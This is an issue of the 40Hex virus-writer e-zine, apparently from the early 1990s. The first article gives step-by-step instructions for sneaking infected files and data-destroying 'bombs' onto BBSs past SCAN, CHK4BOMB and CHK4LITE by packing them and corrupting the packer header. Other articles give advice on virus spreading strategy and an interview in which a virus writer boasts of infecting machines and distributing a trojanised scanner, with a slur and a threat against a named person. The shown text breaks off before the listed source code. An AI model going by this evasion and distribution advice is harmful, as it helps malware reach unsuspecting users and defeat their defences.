40hEX vOLUME 1 iSSUE 2
0000



001...............................hOW TO SNEAK INFECTED FILES INTO PAST scan.

002...............................tHE SAFE WAY TO PLAY WITH VIRUSES.

003...............................tHEORY dEPT.  vIRUSES sLOW VS. fAST.

004...............................iNTERVIEW OF THE MONTH: sKISM oNE.

005...............................aRTICAL ON tHE dARK aVENGER.

006...............................tHE MOTHER OF ALL VIRUSES - whale!

007...............................aND NOW A WORD FROM A REAL DICK.

008...............................tHE oNTARIO vIRUS.

009...............................tHE 1260 vIRUS.

010...............................tHE sKISM 808 SOURCE CODE.

011...............................vIENNA/vIOLATOR SOURCE CODE.




40hEX sTAFF



hELLRAISER....................eDITOR/pROGRAMMING cONSULTANT etc...

nICK hAFLINGER -=phalcon=-....co-eDITOR/wRITER/tHEORY cONSULTANT

sKISM oNE.....................vIRUS SUPPLY/cO-pROGRAMMING cONSULTANT
tHE
pUNISHER (bROOKLYN).......vIRUS SUPPLY
gARBAGE hEAP..................
mAIN vIRUS sUPPLY/oVERSEER

sPELL cHECKER.................oBVOIUSLY THERE IS NONE



cALL THE 40hex/skism hOMEBASE      -----    tHE lANDFILL bbs (914)-hak-vmbs

                                            sYSOP gARBAGE hEAP.

 ANY ARTICLES TO THE 40hEX hq - tHE lANDFILL bbs!


 sPECIAL SHOUT OUT TO - sUB-zERO (THE HARD CORE GROUP), dc wAVE, ALL THE

                        KIDS AT SCHOOL.

                        40hEX vOLUME 1 iSSUE 2
0001

             - how to get infected files into lame bbs'S -



oK, ONE PROBLEM WITH SENDING INFECTED FILES TO bbs'S IS THAT YOU NEVER

CAN TELL IF THEY WILL BE DETECTED BY scan.  oR IF YOU ARE SENDING BOMBS

THE SYSOP MIGHT USE chk4bomb TO DETECT CODE THAT IS DATA DAMAGING.


i'M GONNA TELL YOU HOW TO GET AROUND THIS, WHAT YOU NEED IS THE FOLLOWING-


                            pklite OR lzexe

                                   AND

                           a GOOD HEX EDITOR


wHAT YOU DO IS THIS, COMPRESS THE INFECTED FILE WITH pKLITE OR lZEXE.  tHIS

WILL MAKE CHANGE THE FILES CHECKSUM AND id STRINGS QUITE A BIT SO IT CAN'T

BE DETECTED BY scan AND DAMAGING DATA WILL NOT BE FOUND BY chk4bomb.  tHE

PROBLEM IS THAT NOW THE SYSOP CAN USE chk4lite TO DETECT IS THE FILE IS

INDEED INFECTED.   sO WHAT YOU DO IS THIS --


lOAD UP THE HEX EDITIOR -


nOW LOOK AT THE FILE, IT WILL LOOK SOMETHING LIKE THIS IF YOU COMPRESSED IT

WITH pklite.


------------------------------------------------------------------------------


0000  4d 5a 12 01 13 00 00 00-07 00 98 05 4a a4 52 02  mzjr

0010  00 04 00 00 00 01 f0 ff-50 00 00 00 03 01 50 4b  ppk

0020  4c 49 54 45 20 43 6f 70-72 2e 20 31 39 39 30 20  litecOPR. 1990 

0030  50 4b 57 41 52 45 20 49-6e 63 2e 20 41 6c 6c 20  pkware iNC. aLL 

0040  52 69 67 68 74 73 20 52-65 73 65 72 76 65 64 0   rIGHTS rE SERVED

0050  0a 00 20 00 17 01 48 00-4a 04 4a a4 e2 03 00 40   hjj@

0060  00 00 56 11 00 00 1c 00-00 00 00 00 00 00 00 00  v

0070  b8 e3 07 ba 4b 02 8c db-03 d8 3b 1e 02 00 73 1d  k;S

0080  83 eb 20 fa 8e d3 bc 00-02 fb 83 eb 19 8e c3 53   s

0090  b9 c3 00 33 ff 57 be 48-01 fc f3 a5 cb b4 09 ba  3wh

00a0  36 01 cd 21 cd 20 4e 6f-74 20 65 6e 6f 75 67 68  6! nOT ENOUGH

00b0  20 6d 65 6d 6f 72 79 24-fd 8c db 53 83 c3 2d 03   MEMORY$s-

00c0  da be fe ff 8b fe 8c cd-8b c5 2b ea 8b ca d1 e1  +


------------------------------------------------------------------------------


yOU SEE THE HEADER?  wELL WHAT YOU HAVE TO DO IS OVERWRITE THE HEADER WITH

GARBAGE.  dON'T WRITE TEXT CAUSE THAT IS TO DECTECTABLE BY A DUMP PROGRAM.

jUST OVERWRITE THE PART THAT SAYS "pklite CORP....rESERVED" WITH HEX BYTES.

aLSO DISTROY THE PART OF THE CODE THAT SAYS "nOT ENOUGH MEMORY", DONT KILL

THE "$" SYMBOL.

tHIS WILL MAKE THE COMPRESSED FILE-


a> uNDETECTABLE TO VIRUS SCANNERS, AND chk4bomb TYPE PROGRAMS

b> uN-dECOMPRESSABLE

c> chk4lite WONT NOTICE IT AS A pklite FILE


iT'S THAT EASY!


kEEP IN MIND HOWEVER THAN ANY FILE THAT THE VIRUS INFECTS WILL NO LONGER

BE ENCRYPTED BY pklite, SO THIS METHOD IS GOOD ONLY ON GETTING YOUR VIRUS

INTO THE FRONT DOOR.


sEE THE ARTICLE IN ISSUE ONE ON MAKING NEW VIRUS STRAINS.



                            fORENOTE


     aFTER WRITING THIS ARTICLE scan vERSION 80 CAME OUT, iT NOW HAS THE

     ABILITY TO SCAN INTO pKLITE COMPRESSED FILES.  jUST TO LET YOU KNOW THAT

     THIS TEQNIQUE STILL WORKS AND scan CANNOT DETECT THE FILE AS BEING

     COMPRESSED AS pklite.


                    hr
40hEX vOLUME 1 iSSUE 20002


               the safe way to experiment with viruses



 tHE PROBLEM WITH FOOLING AROUND WITH VIRUSES IS THAT YOU NEVER KNOW

 WHAT DAMAGE THERE GOING TO DO TO YOUR HARD DISK.  i HAVE A COUPLE OF

 SO CALLED VIRUSES THAT WHEN RUN, AUTOMATICALLY SCREW UP THE fat ON

 ALL THE DISKS IN THE SYSTEM.  wELL, THERES A WAY AROUND GETTING THE

 SHAFT FROM THESE PROGRAMS, AND ALSO TO EXPERIMENT WITH LEGITAMENT

 VIRUSES.


 tHE KEY IS THE dos UTITLITY subst, MAKE THIS BATCH FILE, AND COPY IT

 TO A FLOPPY.


 ------------------------------------------------------------------------------

 @ECHO OFF
SUBST D: A:\

 SUBST C: A:\

 ------------------------------------------------------------------------------


  wHAT THIS WILL DO IS SEND ANY ACCESS TO DISKS c: AND d: (THE TWO

  HARD DISKS IN MY CASE) TO DRIVE a:  sO THE ONLY DAMAGE INFLICTED

  WILL BE TO THE FLOPPY IN a:


  nO PROGRAMS CAN ACCESS YOU HARD DISK WHEN THIS COMMAND IS ISSUED.  i

  USE IT ALL THE TIME AND AS OF NOW IT HAS PROVED 100% SAFE.


  oH YEAH, IF YOU DONT FEEL LIKE DISTROYING A FLOPPY EVERY TIME YOU

  MESS WITH A VIRUS, YOU CAN DO THIS TEQNIQUE FROM A ram DISK.


  hAVE FUN...




                         hr

40hEX vOLUME 1 iSSUE 20003



                         vIRUS sPREADING - fAST oR sLOW?
                         bY nICK hAFLINGER -=phalcon=-


                         cALL tHE lANDfILL bbs (914)hAK-vMBS

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


oNE OF THE QUESTIONS WHILE WRITING YOUR VIRUS IS HOW QUICKLY YOU WANT IT

TO SPREAD.  tHE EASY ANSWER IS "aS FAST AS POSSIBLE" BUT THIS IS NOT ALWAYS THE

BEST ANSWER.  iF A VIRUS MOVES SLOWLY, IT WILL TAKE MUCH LONGER BEFORE SOMEBODY

NOTICES HARD DRIVE SPACE DISAPPEARING, HE/SHE WILL NOTICE FEWER CHANGES TO THE

FILE DATES,AND ALL OTHER SYMPTOMS WILL BE LESSENED.  hOWEVER, THIS DOES PROVIDE

LONGER FOR ANTI-VIRUS PEOPLE (PRONOUNCED sCUM, WITH A CAPITAL s) TO DISCOVER THE

VIRUS.  tHIS ISSUE TIES DIRECTLY INTO THE ISSUE OF ACTIVATION, SHORT OR LONG.

sINCE THE ISSUES ARE VIRTUALLY IDENTICAL, i WILL COVER BOTH TOGETHER, BECAUSE

THEY ARE SO CLOSELY TIED.


                        tHE cASE fOR fAST

                        =================


    vIRI SHOULD SPREAD AS QUICKLY AS POSSIBLE.  tHIS ALLOWS AS LITTLE TIME

AS POSSIBLE FOR THE MAKERS OF ANTIVIRUS PROGRAMS TO COME UP WITH AN ANTIDOTE

BEFORE THE VIRUS IS WIDELY SPREAD.  tHIS SHOULD BE TIED WITH A SHORT ACTIVATION

PERIOD TO CAUSE AS MANY PROBLEMS AS POSSIBLE BEFORE DETECTION IS POSSIBLE.

bECAUSE FEWER COPIES ARE GENERATED BEFORE ACTIVATION, EACH COPY MAY BE LARGER.

tHIS ALLOWS FOR MORE EXTENSIVE ANTI-ANTI-VIRAL TACTICS, WHICH ARE BECOMING

INCREASINGLY MORE IMPORTANT AS THE NUMBER OF ANTI-VIRAL PRODUCTS RISES.  jUST

REMEMBER, MOST OF THESE PRODUCTS ARE SHIT. sO DON'T WORRY TOO MUCH.


                        tHE cASE fOR sLOW

                        =================


   vIRI SHOULD SPREAD SLOWLY, BECAUSE THIS IS LESS OBTRUSIVE, AND THEREFORE

USERS ARE LESS LIKELY TO NOTICE A CHANGE IN THE SYSTEM.  tHIS SHOULD BE COUPLED

WITH A LONG ACTIVATION PERIOD AS TO HAVE MAXIMUM PENETRATION BEFORE THE VIRUS

ACTIVATES.  a SLOW-SPREADING VIRUS WILL CIRCULATE TO MORE VIRUS PROGRAMMERS WHO

WILL BE ABLE TO MODIFY THE PROGRAM FOR SPECIFIC NEEDS OR TO ADAPT TO ANTIVIRAL

TACTICS.  oN A PURELY ACADEMIC NOTE, SLOW SPREADING VIRI MUST BE SMALLER, AS

MORE COPIES MUST BE GENERATED.  tHIS MEANS THAT VIRI MUST BE PROGRAMMED BETTER,

WHICH IS GOOD FOR THE GENERAL COMMUNITY.


                        tHE cASE aGAINST fAST

                        =====================


     fAST SPREADING OF VIRI IS LIKELY TO DRAW ATTENTION.  oNCE A VIRUS HAS

BEEN CAUGHT, IN MOST OF THE CASES, IT IS DEAD AND USELESS.  a VIRUS SHOULD

INFECT THE GREATEST AREA IN THE SHORTEST TIME BEFORE THE ANTI-VIRUS PEOPLE

INEVITABLY CATCH UP TO THE VIRUS.  hOWEVER, BECAUSE OF THE NECESSITY OF A SHORT

ACTIVATION TIME, THIS VIRUS HAS A LESSER RANGE THAN A SLOW-SPREADING VIRUS.  tHE

PROGRAMMER MUST RELY ON EITHER (A) THE QUICK DISTRIBUTION OF THE VIRUS ALONG AT

LEAST A REGIONAL LEVEL --OR-- (B) THE ABILITY OF OTHER VIRUS PROGRAMMERS TO

OBTAIN AND MODIFY EITHER THE SOURCE CODE OR DISSASSEMBLE AND MODIFY THE

DISTRIBUTED VIRUS.  iF POSSIBLE, THE SOURCE SHOULD BE DISTRIBUTED ALONG TRUSTED

CHANNELS.  tHERE SHOULD BE AS LITTLE CHANCE AS POSSIBLE OF AN ANTIVIRAL

RESEARCHER OBTAINING A COPY OF THE SOURSE FOR YOUR MASTERPIECE.


                        tHE cASE aGAINST sLOW

                        =====================


        a SLOW SPREADING VIRUS IS MUCH MORE LIKELY TO GET CAUGHT BY ANTIVIRAL

PEOPLE PRIOR TO ITS NECESSARILY LONG PRE-ACTIVATION PERIOD.  tHERE WILL BE MORE

DEFENSES OUT AGAINST THE VIRUS BEFORE IT HAS SPREAD MUCH.  hOWEVER, IF THE VIRUS

IS WELL-DONE, IT WILL HAVE SPREAD FAR BEFORE IT IS CAUGHT.


                        cONCLUSION

                        ==========


    aCTUALLY, i LIED.  tHERE IS NO CONCLUSION TO BE DRAWN FROM THIS, AS THIS

IS IN ITSELF THE CONCLUSION OF LONG HOURS OF THOUGHT AND MUCH BRAINSTORMING ON

bbsS.  iF YOU WOULD LIKE TO COMMENT, i CAN BE REACHED ON lANDfILL bbs, PHONE

NUMBER ABOVE.  iN A FUTURE ARTICLE, i WILL ATTEMPT TO COVER ANTI-ANTI-VIRUS

TACTICS.  i MAY ALSO RESPOND TO SOME IMPORTANT QUESTIONS/COMMENTS i MAY RECIEVE.

sTART YOUR VIRI NOW!  aND MAY THE BEST BUG WIN!



                       nh
40hEX vOLUME 1 iSSUE 20004


                       iNTERVIEW WITH sKISM oNE - aka lORD sss (TRIPLE s)


        tHIS INTERVIEW WAS 

            sQUARE pARK, mANHATTEN.


hr:  sO WHAT GOT YOU STARTED IN THE VIRUS BUSINESS?


sss: wELL, i USED TO WRITE GRAFFITI ALL OVER AND THAT GOT SORT OF

    PLAYED OUT, SO i NEEDED SOMETHING ELSE DISTRUCTIVE TO DO.  sO

    I STARTED GETTING INTO COMPUTERS, THEN THE NEXT THING YOU KNOW

    i'M WRITING VIRUSES.


hr:  wHAT WAS YOU FIRST EXPERENCE WITH VIRUSES?


sss: wELL THE FIRST TIME i HEARD OF THEM WAS WHEN THAT DICKHEAD GOT

     ARRESTED FOR PUTTING THE WORM...


hr:  yOU MEAN mORRIS?


sss: yEAH THAT ASSHOLE, IT WAS ON THE NEWS AND ALL THAT - SO i GOT

     TO THINKING, THAT WOULD BE A COOL THING TO DO.


hr:  wHAT WAS THE FIRST VIRUS YOU RAN ACROSS?


sss: hA... sOME DICK GAVE ME A COPY OF (PAUSE) IT THINK IT WAS

     nORTON 4.0 WHEN IT FIRST CAME OUT.  sO i TOOK IT HOME AND PUT

     IT ON MY HARD DRIVE.  tHE NEXT THING YOU KNOW ALL THIS WEIRD

     SHIT STARTS GOING ON.  lIKE PROGRAMS WON'T RUN AND THIS LITTLE

     BOX OPENS UP ON THE BOTTOM OF MY SCREEN ALL OF A SUDDEN.  sO i

     GET A COPY OF scan, THEN i FIND OUT ALMOST ALL MY FILES ARE

     INFECTED WITH jERUSALEM.


hr:  wHAT DID YOU DO?


sss: wELL i RE-FORMATTED THE DRIVE AND EXAMINED THE COPY OF jERU FOR

     MONTHS.  tHEN ONE DAY i USED A hEX EDITOR TO CHANGE THE SUmsdoS

     STRING TO skism-1.  tHEN i WENT TO ALL THE COMPUTERS i COULD

     FIND AND INFECTED THEM.  tHE NEXT THING YOU KNOW MY FRIEND

     SHOWS ME THIS LIST WITH MY NAME ON IT.  iT WAS pATTI hOFFMANS

     DOCUMENT.  sHIT, i THOUGHT i WAS THE MAN BACK THEN.


hr:  tHEN WHAT?


sss: tHEN - WELL i GOT INTO ASSEMBLER AND DISSASEMBLY AND i STARTED

     TO LEARN HOW TO MODIFY THE CODE AND ALL THAT.  tHE NEXT THING

     YOU KNOW i HAD MADE MY OWN VIRUS FROM THE SCRAPS OF jERU.


hr:  cAPTIAN tRIPS, RIGHT?


sss: yEAH, SORT OF.  tHEN SOMEONE i KNOW SENT IT TO ALL THE BOARDS

     IN TOWN UNDER A TROJAN NAME AND FUCKED A LOT OF PEOPLES SHIT

     UP.  oH WELL.  tHEN i GUESS i GREW OUT OF THE SCAVENGER MODE

     AND STARTED WRITTING MY OWN SHIT, FROM SCRATCH. 


hr:  lIKE WHAT?


sss: wELL THEY WERE ALL CALLED sKISM SO AND SO, LIKE sKISM 10, sKISM

     11 AND ALL THAT.  tHEN i MEET PEOPLE AND THEY STARTED HELPING

     ME OUT AND NOW WE GOT THIS THING GOING ON.


hr:  yOU MEAN sMART kIDS iNTO sICK mETHODS?


sss: yEAH, YOU KNOW ALL THID DID DID DAT.


hr:  hOW DO YOU NAME YOUR VIRUSES?


sss: wELL DEPENDS WHATS ON MY MIND.  sKISM WAS MY TAG FOR LIKE FOUR 

     YEARS, SO i THOUGHT IT WOULD BE COOL IF PEOPLE SAW MY NAME IN 

     THE NEWSPAPER AND ALL THAT.  i GOT cAPTIAN tRIPS AFTER READING 

     tHE sTAND, BY sTEPHEN kING.  1992 WAS JUST WHAT i NAMED IT CAUSE 

     THE VIRUS CAME OUT TO BE ABOUT 1945 BYTES SO i JUSY PADDED IT OUT

     TO NEXT YEARS DATE.  808 WAS NAMED AFTER THE tr-808, A 'DRUM

     MACHINE' USED IN HIP-HOP.


hr:  wHATS THE LATEST PROJECTS?


sss: yOU KNOW, YOU WROTE MOST OF THE SHIT.


hr:  tELL THEM.  tHE PEOPLE.


sss: wELL, WE DID skism 1992, WHICH WAS FUNNY, THEN A MEMBER OF

     skism, WHO SHALL BE NAMELESS MADE 808.  nOW i'M JUST TAKING A

     BREAK FROM VIRUSES AND COMPUTERS FOR THE SUMMER.


hr:  yOU STOPPED?


sss: yOUR CRAZY, NAH - iT'S GOT TO WAIT A WHILE, THEN i'LL GET BACK

     INTO IT - WHEN SCHOOL STARTS AGAIN.


hr:  wHAT DO YOU THINK OF mCaFFE?


sss: hE'S COOL, WHAT THE FUCK AM SUPPOSED TO SAY.  hE DOES A GOOD

     JOB AT SPREADING MY NAME AROUND.  i REALLY LIKE pAT hOFFMAN,

     THANKS FOR THE WRITE UPS.  yOU GOT TO UNDERSTAND - THESE PEOPLE

     MAKE US INTO INFAMOUS VILLIANS.  i CAN DEAL WITH THAT.


hr:  dO YOU MIND THEM DETECTING YOUR VIRUSES?


sss: nAH, FUCK IT - iF MY SHIT CAN MAKE IT FROM ny TO cALIFORNIA

     WITHOUT EFFORT, IT SHOWS IT WORKS.  tHATS IT.  tHERS A LOT MORE

     WHERE THAT CAME FROM.  oNE MORE THING, i HATE THAT GAY BITCH

     rOSS gREENBURG AUTHOR OF fLU-sHOT.  wHAT

     A DICK.  hE'S JUST AN ASSHOLE TRING TO SELL HIS SHIT PRODUCT.

     hE'S GOT A BIG MOUTH AND INSTEAD OF CRASHING HIS BOARD, i'D

     LIKE TO KICK HIS FUCKEN ASS.  wHERE'S HIS OFFICE?  uP ONE 57TH

     RIGHT?  lETS TAKE A WALK.  jUST KIDDIN' BUT THE GUYS PRODUCT

     SUCKS AND HE'S JUST A GREEDY ASSHOLE.  i'M GLAD i SENT A TROJAN

     VERSION OF HIS VIRUS SCANNER AROUND. hA YOU DICK!


hr:  wHAT VIRUS AUTHORS DO YOU LOOK UP TO?


sss: mYSELF - hA hA (LAUGHTER) hA hA.  nO, i LOVE wHALE - THAT WAS

     CLEVER.  i LIKE dARK aVENGER, THE REAL ONE.  iTS HARD TO BE

     ORIGINAL, AND THESE GUYS WERE.  hATS OFF YOU CRAZY FUCKIN'

     bULGARIAN mETAL-hEAD!


hr:  wHAT ABOUT GROUPS OF VIRUS WRITERS?


sss: i THINK WERE THE ONLY ONE.  oH YEAH AND THOSE rABID PEOPLE YOU

     TOLD ME ABOUT, YEAH THERE JUST LIKE US - PEOPLE TRING TO MAKE

     THERE MARK IN THE WORLD, OR SHOULD i SAY DENT IN THE WORLD.

     gERMANS ARE BUGGING OUT TOO - sHIT, THEY WRITE HALF THE SHIT OUT

     THERE THESE DAYS.  mORE POWER TO THEM


hr:  wHAT IS YOUR ADVISE TO PEOPLE WHO WANT TO WRITE VIRUSES?


sss: gET A LATE PASS!  nO AS i SAID MORE POWER TO YOU. jUST REMEMBER

     YOU GOT TO HAVE STYLE AND LEARN TO BE original.


hr:  wHAT NEXT FROM YOU?


sss: i DON'T REALLY KNOW.  i'M WAITING TO HOOK UP A FEW MORE PEOPLE

     TO THE PACK, THEN WE'LL GET THE THING ROLLIN hard.  tILL THEN

     'a LITTLE AT A TIME...'

     
    aT THE TIME THIS ARTICAL WAS FINISHED, THE sKISM TEAM WAS AT WORK ON

         A NEW VIRUS CODE NAMED bAD bRAINS.



                       hr
40hEX vOLUME 1 iSSUE 20005

                       tHE dARK aVENGER

--- ---- -------
pART i.  tHE dARK aVENGER
-------------------------


iNTRODUCTION:

tHE FOLLOWING TEXT FILE WAS SENT DIRECTLY TO pROFESSOR

vESSELIN bONTCHEV IN A PUBLIC SENT TO AN ANTI-VIRAL BOARD

LOCATED IN sOFIA, bULGARIA.


bONTCHEV IS ONE OF THE LEADING ANTI-VIRAL RESEARCHERS IN

eUROPE TODAY.  a PRODUCER OF NUMBER OF EFFECTIVE ANTI-VIRAL

PROGRAMS IN bULGARIA, HIS PROGRAMS ARE WIDELY USED THROUGHOUT

eUROPE.


tHE dARK aVENGER IS bULGARIA'S MOST DANGEROUS VIRAL CODE

WRITER AND A HEAVY METAL FANATIC - AS THIS MESSAGE CONCERNING

HIMSELF, WRITTEN BY HIM (OFTEN REFERRING TO HIMSELF IN THIRD

PERSON) REVEALS:


----------------  dark avenger   ============


   dark avenger IS THE PSEUDONYM USED BY A PARTICULARLY PROLIFIC AND

   MALICIOUS bULGARIAN VIRUS WRITER. iT IS ALSO THE NAME GIVEN IN THE

   wEST TO SOME OF HIS EARLIER VIRUSES. hIS VIRUSES INCLUDE:


   dark avenger v651, v1800, v2000 AND v2100


   number of the beast AKA 512 (SEVERAL VERSIONS)


   anthrax (iNFECTS BOTH FILES AND BOOT SECTORS)


   v800 AND ITS DERIVATIVES: 1226, proud, evil & phoenix


   sOME OTHER VIRUSES, E.G. nomenklatura & diamond ARE IN HIS STYLE BUT

   ARE BELIEVED TO BE THE WORK OF OTHERS. murphy HAS BEEN STRONGLY

   INFLUENCED BY HIM BUT IS KNOWN TO BE OF DIFFERENT AUTHORSHIP.

   crazy eddie MAY ALSO BE HIS.


   sEVERAL 'HACKS' ARE NOW APPEARING OF v1800, v2100, murphy AND

   diamond.


           ************* MORE **********
eDDIE IS THE MASCOT OF THE bRITISH HEAVY METAL GROUP, iRON mAIDEN

(HENCE 'UP THE IRONS'). iT IS A 20 FOOT HIGH SKELETON THAT APPEARS

ON STAGE WITH THEM AND IS FEATURED ON THE SLEEVES OF ALL THEIR ALBUMS.
aNTHRAX AND dAMAGE iNC ARE OTHER HEAVY METAL GROUPS WHOSE NAMES HAVE

BEEN FEATURED IN SOME dARK aVENGER VIRUSES. iRON mAIDEN NUMBERS HAVE

ALSO BEEN MENTIONED INCLUDING 'sOMEWHERE IN tIME', 'oNLY THE gOOD dIE

yOUNG' AND 'nUMBER OF THE bEAST'.
           **************  MORE  **********
uNUSUALLY, THIS VIRUS WRITER HAS ALSO PRODUCED A VIRUS REMOVAL

PROGRAM TOGETHER WITH A VERSION LOG OF HIS eddie SERIES, AS

REPRODUCED BELOW WITH ITS ORIGINAL SPELLING AND GRAMMAR.


"doctor   quick!   vIRUS dOCTOR FOR THE eDDIE vIRUS   vERSION 2.01

10-31-89 cOPYRIGHT (C) 1988-89 dARK aVENGER.  aLL RIGHTS RESERVED.

doctor /? FOR HELP


iT MAY BE OF INTEREST TO YOU TO KNOW THAT eDDIE (ALSO KNOWN AS "dARK

aVENGER") IS THE MOST WIDESPREAD VIRUS IN bULGARIA FOR THE TIME

BEING.  hOWEVER i HAVE INFORATION THAT eDDIE IS WELL KNOWN IN THE

usa, wEST gERMANY AND ussr TOO.


i STARTED IN WRITING THE VIRUS IN EARLY sEPTEMBER 1988. iN THOSE

TIMES THERE WERE NO ANY VIRUSES IN bULGARIA, SO i DECIDED TO WRITE

THE FIRST bULGARIAN VIRUS.  tHERE WERE SOME DIFFERENT eDDIE'S  VERSIONS:

version 1.1, 16-dec-1988


iN dECEMBER i'VE DECIDED TO ENHANCE THE VIRUS.  tHIS VERSION COULD

INFECT FILES DURING THEIR OPENING.  fOR THAT REASON, A READ BUFFER

WAS ALLOCATED IN HIGH END OF MEMORY, RATHER THAN USING dos FUNCTION

48H WHEN NEEDED.  tHE DISK WAS DESTROYED INSTEAD OF THE INFECTED FILES.

version 1.2, 19-dec-1988


tHIS ADDED A NEW FEATURE THAT CAUSES (FOR EXAMPLE) COMPILED PROGRAMS

TO BE INFECTED AT ONCE IF THE VIRUS IS RESIDENT.  aLSO, THE "eDDIE
  LIVES..."
MESSAGE WAS ADDED (CAN YOU GUESS WHY EXACTLY "eDDIE"?)

version 1.31, 3-jan-1989


tHIS BECAME THE MOST COMMON VERSION OF eDDIE. a CODE WAS ADDED TO

FIND THE int 13 ROM-VECTOR ON MANY POPULAR xt'S AND at'S.  aLSO,

OTHER MESSAGES WERE ADDED SO ITS LENGTH WOULD BE EXACTLY 1800 BYTES.

tHERE WAS A SUBSEQUENT, 1.32 VERSION (19-jan-1989), WHICH ADDED

SELF-CHECKSUM AND OTHER INTERESTING FEATURES THAT WAS ABANDONED

BECAUSE IT WAS EXTREMELY BUGGY.


iN EARLY mARCH 1989 VERSION 1.31 WAS CALLED INTO EXISTENCE AND

STARTED TO LIVE ITS OWN LIFE TO ALL ENGINEERS' AND OTHER SUCKERS'

TERROR.  aND, THE LAST


version 1.4, 17-oct-1989


tHIS WAS A BUGFIX FOR VERSION 1.31, AND ADDED SOME INTERESTING NEW

FEATURES.  sUPPORT HAS BEEN ADDED FOR dos 2.X AND dos 4.X.  fOR

FURTHER INFORMATION ABOUT THIS (THE MOST TERRIBLE) VERSION, AND TO

LEARN HOW TO FIND OUT A P

VIRUS-WRITERS ARE STILL NOT DEAD, CONTACT mR. vESSELIN bONTCHEV (aLL

rIGHTS rESERVED).


sO, NEVER SAY DIE!  eDDIE LIVES ON AND ON AND ON...  uP THE IRONS!"


note:
  vESSELIN bONTCHEV, WHO THE dARK aVENGER IS TRYING TO DISCREDIT, IS A

LEADING VIRUS RESEARCHER AT THE bULGARIAN aCADEMY OF sCIENCES.



pOST nOTE:


tHERE IS A RUMOR CONCERNING THE FACT THAT rabid NOW HAS

THE dARK aVENGER ON THEIR STAFF OF VIRUS WRITERS, AND THAT

THE NEW dARK aVENGER VARIANT RELEASED BY THEM WAS, IN FACT,

WRITTEN BY HIM.  tHIS HAS YET TO BE PROVEN.


tHE MORE ACCEPTABLE BELIEF CONCERNING THIS NEW STRAIN

IS THAT rabid SIMPLY PICKED UP THE SOURCE CODE FOR dARK aVENGER,

RELEASED LAST dECEMBER, AND MODIFIED IT.



pART ii - dARK aVENGER - sTRAIN a

-----------------------


vESSELIN bONTCHEV REPORTS IN mAY 1990:


tHE dARK aVENGER VIRUS.

======================


- i FOUND TWO NEW MUTATIONS OF THIS VIRUS. wELL, MAYBE

"MUTATIONS" IS NOT THE CORRECT WORD. iN THE FIRST OF THEM, THE

FIRST 16 CHARACTERS OF THE STRING "eDDIE LIVES...  SOMEWHERE IN

TIME!" WERE REPLACED WITH BLANKS.


iN THE SECOND EXAMPLE, ALL STRINGS (THE MESSAGE ABOVE, THE

COPYRIGHT MESSAGE AND THE "dIANA p."  STRING) WERE REPLACED WITH

BLANKS.  - tHE AUTHOR OF THE dARK aVENGER VIRUS (tHE BASTARD!  i

STILL CANNOT DETERMINE WHO HE IS.) HAS RELEASED THE SOURCE CODE

OF HIS VIRUS.


iT IS FULL WITH IRONIC COMMENTS ABOUT ME.  oF COURSE, NOW WE HAVE

TO EXPECT LOTS OF NEW,SIMILAR VIRUSES TO APPEAR.  aT LEAST, THIS

LEADED TO ONE GOOD THING - THE SOURCE HELPED ME VERY MUCH IN

DISASSEMBLING THE v2000 VIRUS.  - i RECEIVED A RATHER OFFENSIVE

ANONYMOUS LETTER FROM THIS PERSON.  iN IT HE CLAIMS TO BE ALSO

THE AUTHOR OF BOTH THE v2000 (i TRUST THIS) AND THE nUMBER OF THE

bEAST VIRUSES (THE LATTER IS UNLIKELY).  [sEE aBOVE]



iNFORMATION aBOUT THE dARK aVENGER vIRUS, COURTESY OF

"vIRUS bULLETIN lTD," bUCKINGHAMSHIRE, eNGLAND.


nOTE:

tHIS INFORMATION IS FAR MORE VALUABLE THAN THE STANDARD

vIRUS sUMMARY BY pATRICIA hOFFMAN.  hER ENTRY CONCERNING da

FAILS TO GO INTO MORE DEPTH ABOUT THE dARK aVENGER VIRUS AND

APPARENTLY SHE HAS YET TO RECEIVE INFORMATION OF THE

DIFFERENT VERSIONS OF da.  sUCH INFORMATION IS ALREADY A YEAR

OLD, BUT SHE HAS YET TO INCLUDE IT.


eNTRY...............: dARK aVENGER

aLIAS(ES)...........: ---

vIRUS sTRAIN........: dARK aVENGER

vIRUS DETECTED WHEN.: nOVEMBER 1989

WHERE.: usa

cLASSIFICATION......: fEBRUARY 1990

lENGTH OF vIRUS.....: ABOUT 1800 bYTES
--------------------- pRECONDITIONS -----------------------------------

oPERATING sYSTEM(S).: dos

vERSION/rELEASE.....:

cOMPUTER MODEL(S)...:ibm-COMPATIBLE

--------------------- aTTRIBUTES --------------------------------------

eASY iDENTIFICATION.: tWO tEXTS:

"eDDIE LIVES...SOMEWHERE IN TIME" AT BEGINNING

                   AND
"tHIS pROGRAM WAS WRITTEN IN THE cITY OF sOFIA

(c) 1988-89 dARK aVENGER" NEAR END OF FILE


tYPE OF INFECTION...: lINK-VIRUS

com-FILES: APPENDS TO THE PROGRAM AND INSTALLS A SHORT JUMP
exe-FILES: APPENDS TO THE PROGRAM AT THE BEGINNING OF THE NEXT PARAGRAPH


iNFECTION tRIGGER...: com AND exe FILES ARE CORRUPTED ON ANY READ ATTEMPT EVEN
WHEN viewing!!!


sTORAGE MEDIA AFFECTED: aNY dRIVE


iNTERRUPTS HOOKED...: iNT 21 dos-SERVICES

iNT 27 tERMINATE AND sTAY rESIDENT


dAMAGE..............: oVERWRITES A RANDOM SECTOR WITH BOOTBLOCK


dAMAGE tRIGGER......: EACH 16TH INFECTION; COUNTER LOCATED IN bOOTBLOCK


pARTICULARITIES.....: -

sIMILARITIES........: -



--------------------- aGENTS ------------------------------------------


cOUNTERMEASURES.....: none! aLL DATA CAN BE DESTROYED !!!!

                     tHERE IS NO WAY IN RETRIEVING LOST DATA.

                     bACKUPS WILL MOST PROBABLY BE DESTROYED TOO.


cOUNTERMEASURES SUCCESSFUL: INSTALL mCaFEE'S scanres.


sTANDARD MEANS......: gOOD LUCK! hOPEFULLY THE VIRUS DID NOT DESTROY

                      TOO MANY OF YOUR PROGRAMS AND DATA.


--------------------- aCKNOWLEDGEMENT ---------------------------------

lOCATION............: vtc uNI hAMBURG

cLASSIFICATION BY...: mATTHIAS jAENICHEN

dOCUMENTATION BY....: mATTHIAS jAENICHEN

dATE................: 31.01.1990
 


pART iii - dark avenger 2000

=================


dATE:    02 fEB 90 10:49:00 +0700
 fROM: vESSELIN bONTCHEV


